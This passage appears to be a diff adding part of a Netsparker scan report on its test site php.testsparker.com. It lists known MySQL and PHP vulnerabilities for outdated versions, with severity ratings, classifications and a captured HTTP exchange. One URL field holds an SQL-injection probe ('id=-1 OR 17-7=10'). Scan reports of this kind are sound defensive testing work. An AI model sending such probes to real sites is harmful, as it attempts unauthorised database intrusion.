+ { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Improper Neutralization of Special Elements used in a Command ('Command Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Privilege Management Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:54 AM", + "Name": "Out-of-date Version (MySQL)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of MySQL to the latest stable version.
    ", + "RemedyReferences": "
    ", + "Severity": "Critical", + "State": "Revived", + "Type": "MySqlOutOfDate", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.2.6" + }, + { + "Name": "Latest Version", + "Value": "8.0.7" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "df809200-a510-4daf-8722-ad48024dd66f", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + 